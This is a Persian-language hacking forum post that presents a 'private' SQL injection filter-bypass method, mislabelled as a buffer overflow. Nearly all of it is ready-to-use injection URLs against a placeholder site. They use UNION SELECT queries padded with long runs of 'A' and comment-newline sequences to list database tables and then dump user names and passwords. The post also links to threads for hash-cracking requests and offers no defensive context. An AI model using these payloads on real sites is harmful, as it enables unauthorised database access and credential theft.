SpareNet Servers Advertising & Link Exchange

اطلاعیه

بستن
هیچ اطلاعیه ای هنوز ایجاد نشده است .

buffer overflow sql inejction method

بستن
X
 
 • فیلتر
 • زمان
 • نمایش
پاک کردن همه
نوشته‌های جدید

 • buffer overflow sql inejction method

  priv8 method for bypass more target in Sql injection

  با استفاده از این نوع بای پس میتونید بیشتر تارگت های Sql رو از طریق حملات سرریز بافر مورد تست نفوذ قرار بدهید .


  کد:
  http://www.target.com/index.php?newsid=-1%20UNION%23AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%0aselect%201,2,3,4,5,6,7,8--+
  
  http://www.target.com/index.php?newsid=-1%20UNION%23AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%0Aselect%201,table_name,3,4,5,6,7,8%23AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%0Ainformation_schema%23AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%0Afrom%23AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%0Ainformation_schema%23AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%0A.tables
  
  http://www.target.com/index.php?newsid=-1%20UNION%23AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%0Aselect%201,table_name,3,4,5,6,7,8%23AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%0Ainformation_schema%23AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%0Afrom%23AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%0Ainformation_schema%23AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%0A.tables
  
  http://www.target.com/index.php?newsid=-1%20UNION%23AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%0Aselect%201,table_name,3,table_name,table_name,6,7,8%23AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%0Ainformation_schema%23AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%0Afrom%23AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%0Ainformation_schema%23AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%0A.tables%23AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%0ALIMIT%203,2
  
  http://www.target.com/index.php?newsid=-1%20UNION%23AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%0Aselect%201,table_name,3,table_name,table_name,6,7,8%23AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%0Ainformation_schema%23AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%0Afrom%23AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%0Ainformation_schema%23AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%0A.tables%23AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%0ALIMIT%2041,2
  punch

  کد:
  http://www.target.com/index.php?newsid=-1%20UNION%23AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%0Aselect%201,2,3,group_concat(name,0x3a,pass),5,6,7,8%23AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%0Afrom%23AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%0Auser
  سوالی بود دوستان در ادامه همین تاپیک میتونند بپرسند یه ویدئو آموزشی از این نوع حملات هم تو راهه
  ------------=========تاپیک سوالات کاربران==========------------

  http://forum.iranhack.com/thread-3197.html

  ------------========Hash-Cracking Requests========------------

  http://forum.iranhack.com/thread-3204.html


  ای چنگ ! مرا مشتری عشق قدیمی کردی
  خوابم تو ربودی و پلک تو سنگین کردی
  من در پی هر تار تو صد جان بدهم
  ساز فرهاد شدی و قصد شیرین کردی
صبر کنید ..
X